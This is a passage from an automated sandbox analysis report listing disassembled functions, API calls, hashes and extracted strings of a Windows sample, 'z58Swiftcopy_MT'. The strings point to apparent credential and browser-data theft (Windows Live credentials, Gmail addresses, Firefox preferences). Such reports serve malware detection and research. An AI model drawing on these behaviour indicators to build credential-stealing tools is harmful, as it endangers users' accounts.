                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                                                                      Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                                                      • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                                      • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                                      • API String ID: 945165440-3589380929
                                                                                                                                                                                                                                      • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                      • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                                                                      Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                        • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                                                      • String ID: %s@gmail.com
                                                                                                                                                                                                                                      • API String ID: 3261640601-4097000612
                                                                                                                                                                                                                                      • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                                                                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                                                                      Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                                      • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                                                                      Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                                                                        • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                                                                        • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                                                                        • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2485852401-0
                                                                                                                                                                                                                                      • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                                      • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                                                                      Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3642520215-0
                                                                                                                                                                                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                                                                      Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405C3B
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                                      • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                                                                                      • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                                                                      Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2126104762-0
                                                                                                                                                                                                                                      • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                                      • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                                                                      Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1999381814-0
                                                                                                                                                                                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                                                                      Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                                                                      Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                                                                      Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                                      • String ID: user_pref("
                                                                                                                                                                                                                                      • API String ID: 765841271-2487180061
                                                                                                                                                                                                                                      • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                      • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                                                                      Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
